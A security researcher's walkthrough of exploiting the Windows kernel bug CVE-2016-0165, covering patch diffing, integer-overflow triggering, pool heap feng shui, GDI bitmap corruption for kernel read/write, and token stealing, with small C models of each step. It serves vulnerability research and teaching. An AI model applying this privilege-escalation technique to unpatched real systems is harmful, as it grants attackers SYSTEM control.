On April 12, 2016, Microsoft released 13 security bulletins.
Let’s talk about how I triggered and exploited CVE-2016-0165, one of the vulnerabilities fixed by MS16-039.
Diffing Stage
For MS16-039, Microsoft released a fix for all Windows versions, both 32-bit and 64-bit.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 and CVE-2016-0167.
Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».
It’s interesting to note that this function has been exported since Windows 10, when «win32k.sys» was split into three parts: «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».
If we look at the diff between the old and the new version of the function, we can see on the right side that the first red basic block (left-top) contains a call to the «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.
In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.
Summing up, two integer overflows were patched in the same function.
Understanding the fix
If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:
"lea ecx,[rax+rax*2]"
In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).
At the same time, we can see that the number of structs is held in a 64-bit register, but the destination of this calculation is a 32-bit register!
Now that we know it’s an integer overflow, the only thing we need to find out is which number, multiplied by 3, gives a result that reaches 4GB.
The idea is that this result can’t be represented by a 32-bit number.
A simple way to find it is the following calculation:
(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)
Now, if we multiply this result by 3, we obtain:
0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes
In the same basic block, two instructions below («shl ecx,4»), we can see that the number «2» obtained previously is shifted left by 4 bits, which is the same as multiplying it by 16, resulting in the value 0x20.
So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂
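The arithmetic above can be checked with a small sketch. It only models the two instructions discussed («lea ecx,[rax+rax*2]» and «shl ecx,4»); the function name is hypothetical and nothing here is taken from the real «win32kbase.sys» code.

```c
#include <stdint.h>

/* Simplified model of the vulnerable size computation: the POINT count is
 * multiplied by 3 into a 32-bit register (lea ecx,[rax+rax*2]) and the
 * result is then shifted left by 4 (shl ecx,4). */
static uint32_t vulnerable_alloc_size(uint64_t point_count)
{
    uint32_t times3 = (uint32_t)(point_count * 3u); /* upper 32 bits are lost */
    return times3 << 4;                             /* x16, still 32-bit */
}
```

With 0x55555556 points the function returns 0x20, the tiny size that ends up being allocated for more than a billion structs.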
Path to the vulnerability
For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls the vulnerable function directly.
From user space, this function is reached through «PathToRegion», which is exported by «gdi32.dll».
Triggering the vulnerability
Now that we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability. But is it possible to reach this number of POINTs?
In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo».
Looking at the documentation, we see this definition:
BOOL PolylineTo(
  _In_ HDC hdc,
  _In_ const POINT *lppt,
  _In_ DWORD cCount
);
The second argument is a POINT struct array and the third one is the array size.
It’s easy to think that if we create 0x55555556 structs and pass them as a parameter we will trigger the vulnerability, but WE WON’T. Let’s see why.
If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».
«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.
If we look at this function, there is a check on the number of POINT structs passed as an argument:
The maximum number of POINTs that we can pass as a parameter is 0x4E2000.
It’s clear that there is no direct way to reach the number needed to trigger this vulnerability, so what is the trick?
Well, after some tests, the answer was pretty simple: «call PolylineTo many times until the wanted number of POINT structs is reached».
And the result was this:
The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.
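To get a feeling for how many calls this takes, here is a rough planning sketch. It assumes that the 0x4E2000 limit is inclusive and that every POINT passed adds exactly one to the total seen by «PathToRegion»; both are assumptions of mine, and the helper names are hypothetical.

```c
#include <stdint.h>

#define MAX_POINTS_PER_CALL 0x4E2000u /* limit quoted above, assumed inclusive */

/* Number of PolylineTo-style calls needed to accumulate `total` points. */
static uint32_t calls_needed(uint32_t total)
{
    return (uint32_t)(((uint64_t)total + MAX_POINTS_PER_CALL - 1)
                      / MAX_POINTS_PER_CALL);
}

/* Number of points to pass in call number `index` (0-based); 0 when done. */
static uint32_t batch_size(uint32_t total, uint32_t index)
{
    uint64_t done = (uint64_t)index * MAX_POINTS_PER_CALL;
    if (done >= total)
        return 0;
    uint64_t left = total - done;
    return left < MAX_POINTS_PER_CALL ? (uint32_t)left : MAX_POINTS_PER_CALL;
}
```

Under these assumptions, reaching 0x55555556 points takes 280 calls on the same HDC: 279 full batches and a final, smaller one.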
PALLOCMEM2 function — «Bonus Track»
Triggering this vulnerability is relatively easy on 64-bit targets like Windows 8, 8.1 and 10.
Now, on 64-bit «Windows 7», the vulnerability is very difficult to exploit.
Let’s see the vulnerable basic block and the memory allocator function:
The destination of the multiplication by 3 is a 64-bit register (rdx), not a 32-bit register as in the Windows versions mentioned before.
The only feasible way to produce an integer overflow is with the previous instruction:
In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to exhaust kernel memory than to allocate this number of structures.
Now, why is Windows 7 different from the latest Windows versions?
Well, if we look at the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».
What is the difference?
The «PALLOCMEM2» function receives a 32-bit size argument, but the «__imp_ExAllocatePoolWithTag» function receives a 64-bit size argument.
The argument type defines how the result of the multiplication is passed to the allocator function; in this case, the result is cast to «unsigned int».
We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now call «PALLOCMEM2» have been exposed to integer overflows that are much easier to exploit.
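The difference between the two allocators can be illustrated by computing the same product with both argument widths. This is only a model of the cast described above, with hypothetical function names.

```c
#include <stdint.h>

/* Size as seen by an allocator that takes a 64-bit size argument. */
static uint64_t size_for_64bit_allocator(uint64_t point_count)
{
    return (point_count * 3u) << 4;
}

/* Size as seen by an allocator that takes a 32-bit size argument:
 * the same product is cast to unsigned int and the high bits vanish. */
static uint32_t size_for_32bit_allocator(uint64_t point_count)
{
    return (uint32_t)((point_count * 3u) << 4);
}
```

For 0x55555556 points the 64-bit version asks for 0x10'0000'0020 bytes, a request that can be expected to fail cleanly, while the 32-bit version asks for just 0x20 bytes.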
Analyzing the heap overflow
Once we trigger the integer overflow, we have to understand what the consequences are.
As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».
This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.
It’s intuitive to think that if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that would destroy a big part of the Windows kernel heap and quickly give us a BSoD.
What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the vulnerable function.
The trick here is that POINT structs are copied only when their coordinates ARE NOT REPEATED.
E.g.: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.
Thus, it’s possible to control exactly how many structures will be used by the heap overflow.
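A simplified way to picture this is the sketch below. It assumes that a point is skipped only when it repeats the coordinates of the point right before it, which is my reading of the behavior described above and not the real «AddEdgeToGet» logic; the type and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct { int32_t x; int32_t y; } point_t; /* stand-in for POINT */

/* Counts how many points would be copied if every point that repeats the
 * coordinates of its predecessor is skipped. */
static size_t count_copied_points(const point_t *pts, size_t n)
{
    size_t copied = 0;
    for (size_t i = 0; i < n; i++) {
        if (i > 0 && pts[i].x == pts[i - 1].x && pts[i].y == pts[i - 1].y)
            continue; /* repeated coordinates: nothing is copied */
        copied++;
    }
    return copied;
}
```

In this model, padding the path with repeated points raises the total count without increasing the amount of data copied.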
Some exploitation considerations
One of the most important things to know before starting to write the exploit is that the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since it is used only temporarily.
It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.
Unfortunately, only some of the overwritten values are fully controlled by us, so we are not able to overwrite the next chunk header with its original content.
On the other hand, we can think of the alloc/free operation as «atomic», because we don’t get control of execution back until the «PathToRegion» function returns.
So, how is it possible to successfully exploit this vulnerability?
Four years ago I explained something similar in the «The Big Trick Behind Exploit MS12-034» blogpost.
Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.
So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained in the second memory page will be corrupted, but we will avoid a BSoD when the allocated memory is freed.
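The condition we are after can be written as a one-line check. The sketch assumes a 0x10-byte chunk header and small chunks that do not span pages; the address in the usage note is made up.

```c
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SIZE_BYTES   0x1000u
#define POOL_HEADER_BYTES 0x10u /* assumed chunk header size on 64-bit */

/* True when a small chunk (header + data) starting at `chunk_addr` ends
 * exactly on a page boundary, so no chunk header follows it in that page. */
static bool chunk_ends_page(uint64_t chunk_addr, uint32_t data_size)
{
    uint64_t end = chunk_addr + POOL_HEADER_BYTES + data_size;
    return (end % PAGE_SIZE_BYTES) == 0;
}
```

For example, a 0x50-byte allocation whose chunk starts at offset 0xFA0 inside a page passes the check, while the same allocation at offset 0xF00 does not.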
Finding the best memory allocator
Considering the above, it’s now necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.
When a heap spray requires several iterations, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», in reference to the ancient Chinese practice (https://en.wikipedia.org/wiki/Feng_shui).
The POOL TYPE used by the vulnerable function is 0x21, which in Microsoft’s «POOL_TYPE» enumeration is «PagedPoolSession», defined as «NonPagedPoolSession» (0x20) + 1.
Knowing this, it’s necessary to find a function that allows us to allocate memory in this pool type with the best possible accuracy.
The best function that I have found to heap spray the pool type 0x21 is the undocumented «ZwUserConvertMemHandle» function, located in «gdi32.dll» and «user32.dll».
When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».
If we look at the «ConvertMemHandle» code, we can see the perfect allocator:
Basically, this function receives two parameters, BUFFER and SIZE, and returns a HANDLE.
If we only look at the yellow basic blocks, we can see that the «ConvertMemHandle» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.
To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard».
Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.
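When planning the spray it helps to know how much pool space a given SIZE consumes. The sketch below uses the SIZE + 0x14 figure from above and assumes, on my side, a 0x10-byte chunk header and a 0x10-byte allocation granularity on 64-bit; the helper name is hypothetical.

```c
#include <stdint.h>

#define OBJECT_OVERHEAD 0x14u /* extra bytes added to SIZE, per the text */
#define POOL_HEADER     0x10u /* assumed 64-bit chunk header size */
#define POOL_GRANULE    0x10u /* assumed 64-bit allocation granularity */

/* Total pool bytes consumed when a user buffer of `size` bytes is sprayed. */
static uint32_t pool_chunk_bytes(uint32_t size)
{
    uint32_t raw = size + OBJECT_OVERHEAD + POOL_HEADER;
    return (raw + POOL_GRANULE - 1) & ~(POOL_GRANULE - 1); /* round up */
}
```

Under these assumptions, a SIZE of 0x3C fills a 0x60-byte slot, so the requested size can be tuned to shape holes of a chosen length.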
Choosing GDI objects to be overwritten
Now that we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.
Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.
In that blogpost he described how GDI objects are composed:
typedef struct {
  BASEOBJECT64 BaseObject;
  SURFOBJ64 SurfObj;
  [...]
} SURFACE64;
As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».
In my case, the problem is that I don’t control all the values overwritten by the heap overflow, so I can’t overwrite this property with a USEFUL ADDRESS.
A variant of abusing GDI object
Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.
After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.
This picture shows the content of the GDI object, before and after the heap overflow:
The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set to the value 0xFFFFFFFF.
It means that the GDI object now has width=0xFFFFFFFF and height=0x01.
So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!
Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed to by «SURFOBJ64.pvScan0» is contiguous to the object properties.
With all these things, it was time to write an exploit …
Exploitation — Step 1
In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.
So, the new calculation is:
0x55555557 x 3 = 0x1'0000'0005
As the result is stored in a 32-bit register, we get 0x5, and then this number is multiplied by 16:
0x5 << 4 = 0x50
It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.
I decided to increase the size by 0x30 bytes because very small chunk allocations are not always predictable.
Adding the chunk header size (0x10 bytes), the heap spray to do should be like this:
Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.
Due to alignment problems between the small chunk used and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.
Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.
Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.
Exploitation — Step 1.5
Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.
As the heap spray uses a large number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which one has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.
Looking at the function prototype:
HBITMAP CreateBitmap(
  _In_ int nWidth,
  _In_ int nHeight,
  _In_ UINT cPlanes,
  _In_ UINT cBitsPerPel,
  _In_ const VOID *lpvBits
);
As an example, we could create a GDI object like this:
CreateBitmap (100, 100, 1, 32, lpvBits);
Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits per pixel) it will fail, unless the object has been overwritten afterwards.
So, the way to detect which GDI object has been modified is to check which one behaves differently from what is expected.
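The detection loop can be modeled without touching GDI at all. In the sketch below, «fake_get_bits» is a hypothetical stand-in for «GetBitmapBits» that simply never returns more bytes than width x height x bytes-per-pixel; the real function’s return value on oversized requests is not modeled precisely.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct { uint32_t width, height, bits_per_pixel; } fake_bitmap_t;

/* Bytes of pixel data implied by the bitmap dimensions. */
static uint64_t bitmap_bytes(const fake_bitmap_t *b)
{
    return (uint64_t)b->width * b->height * (b->bits_per_pixel / 8);
}

/* Stand-in for GetBitmapBits: reports how many bytes it would hand back. */
static uint64_t fake_get_bits(const fake_bitmap_t *b, uint64_t requested)
{
    uint64_t cap = bitmap_bytes(b);
    return requested < cap ? requested : cap;
}

/* Returns the index of the first object that gives back more data than a
 * bitmap of `expected_bytes` ever should, or -1 if none does. */
static int find_corrupted(const fake_bitmap_t *objs, size_t n,
                          uint64_t expected_bytes)
{
    for (size_t i = 0; i < n; i++)
        if (fake_get_bits(&objs[i], expected_bytes + 1) > expected_bytes)
            return (int)i;
    return -1;
}
```

Asking each object for one byte more than it should own is enough: only the object whose width was overwritten can satisfy the request.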
Exploitation — Step 2
Now that we can read/write beyond the GDI object limits, we can use this new ability to overwrite a second GDI object and thus get an arbitrary write.
Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after the first one.
So, if from the first GDI object, we are able to write the contiguous memory that we want, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.
Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.
Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.
It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.
On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.
Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.
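The two-object technique can be simulated in user space with a flat byte array playing the role of kernel memory. Everything in this sketch is a model: the 16-byte surface header, the offsets and the helper names are hypothetical, and «get_bits»/«set_bits» only imitate the size check of «GetBitmapBits/SetBitmapBits».

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MEM_SIZE 0x3000u
static uint8_t mem[MEM_SIZE]; /* stand-in for kernel memory; addresses are offsets */

/* Hypothetical minimal surface header: cx, cy, pvScan0, then the pixels. */
enum { OFF_CX = 0, OFF_CY = 4, OFF_SCAN0 = 8, HDR_SIZE = 16 };

static void put32(uint64_t a, uint32_t v) { memcpy(&mem[a], &v, sizeof v); }
static void put64(uint64_t a, uint64_t v) { memcpy(&mem[a], &v, sizeof v); }
static uint32_t get32(uint64_t a) { uint32_t v; memcpy(&v, &mem[a], sizeof v); return v; }
static uint64_t get64(uint64_t a) { uint64_t v; memcpy(&v, &mem[a], sizeof v); return v; }

/* Creates a 32 bpp surface whose pixel data directly follows its header. */
static void make_surface(uint64_t obj, uint32_t cx, uint32_t cy)
{
    put32(obj + OFF_CX, cx);
    put32(obj + OFF_CY, cy);
    put64(obj + OFF_SCAN0, obj + HDR_SIZE);
}

/* Clamps len to cx*cy*4 and rejects ranges that leave the model's memory. */
static size_t usable_len(uint64_t obj, size_t len)
{
    uint64_t cap = (uint64_t)get32(obj + OFF_CX) * get32(obj + OFF_CY) * 4;
    uint64_t at = get64(obj + OFF_SCAN0);
    if (len > cap) len = (size_t)cap;
    return (at > MEM_SIZE || len > MEM_SIZE - at) ? 0 : len;
}

/* Stand-ins for GetBitmapBits / SetBitmapBits; both return the bytes moved. */
static size_t get_bits(uint64_t obj, void *dst, size_t len)
{
    len = usable_len(obj, len);
    if (len) memcpy(dst, &mem[get64(obj + OFF_SCAN0)], len);
    return len;
}

static size_t set_bits(uint64_t obj, const void *src, size_t len)
{
    len = usable_len(obj, len);
    if (len) memcpy(&mem[get64(obj + OFF_SCAN0)], src, len);
    return len;
}

/* Uses the enlarged first surface to retarget the second one, then writes
 * through the second. Returns 1 on success, 0 otherwise. */
static int write_anywhere(uint64_t first, uint64_t second, uint64_t target,
                          const void *src, size_t len)
{
    static uint8_t buf[MEM_SIZE];
    uint64_t pixels = get64(first + OFF_SCAN0);
    uint64_t field = second + OFF_SCAN0; /* address of second.pvScan0 */
    if (field < pixels || field - pixels + 8 > sizeof buf) return 0;
    size_t span = (size_t)(field - pixels) + 8;
    if (get_bits(first, buf, span) != span) return 0; /* read the data in between */
    memcpy(buf + span - 8, &target, 8);               /* patch only pvScan0 */
    if (set_bits(first, buf, span) != span) return 0; /* write it all back */
    return set_bits(second, src, len) == len;
}
```

As in the real exploit, the write fails while the first surface still has its original width, and it starts working once its «cx» field is set to 0xFFFFFFFF. Reading the gap first and writing the same bytes back keeps the second object’s other fields intact.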
Exploitation — Final Stage
Once we get a kernel read/write primitive, we could say that the last step is pretty simple.
The idea is to steal the «System» process token and set it to our process (exploit.exe).
As this attack is done from «Low Integrity Level», we have to know that it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so, we have to take the long way.
The EPROCESS list is a linked list, where every element is an EPROCESS struct that contains information about a unique running process, including its TOKEN.
This list is pointed to by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we can get the «PsInitialSystemProcess» kernel address, and then do the famous TOKEN KIDNAPPING.
The best way I know of leaking a Windows kernel address is by using the «sidt» instruction, which can be executed from user mode.
This instruction returns the size and address of the operating system interrupt descriptor table (IDT), located in kernel space.
Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.
The next step is to read «ntoskrnl.exe» memory backwards until we find the well-known «MZ» signature, which marks the base address of «ntoskrnl.exe».
Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.
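The last two steps boil down to a backwards scan and a subtraction. The sketch below works on an ordinary buffer instead of kernel memory and assumes the image base is page aligned; the helper names and the addresses in the usage note are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE 0x1000u

/* Walks backwards page by page from `offset` until a page that starts with
 * "MZ" is found. Returns that page offset, or (size_t)-1 if none is found.
 * `mem` stands in for what the kernel read primitive would return. */
static size_t find_mz_page(const uint8_t *mem, size_t offset)
{
    size_t page = offset & ~(size_t)(PAGE - 1);
    for (;;) {
        if (mem[page] == 'M' && mem[page + 1] == 'Z')
            return page;
        if (page == 0)
            return (size_t)-1;
        page -= PAGE;
    }
}

/* Rebases a symbol found in the user-space copy of the image onto the
 * kernel base: kernel_base + (symbol - user_base). */
static uint64_t kernel_symbol_address(uint64_t kernel_base, uint64_t user_base,
                                      uint64_t user_symbol)
{
    return kernel_base + (user_symbol - user_base);
}
```

For instance, with a kernel base of 0xFFFFF80000000000, a user-space load address of 0x140000000 and a symbol at 0x1403A5000, the rebased address is 0xFFFFF800003A5000.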
As a result of what I explained before, I obtained this:
Final notes
It’s important to say that it wasn’t necessary to use the GDI object memory leak explained in the «Abusing GDI for ring0 exploit primitives» blogpost.
However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all kernel exploit mitigations implemented until now.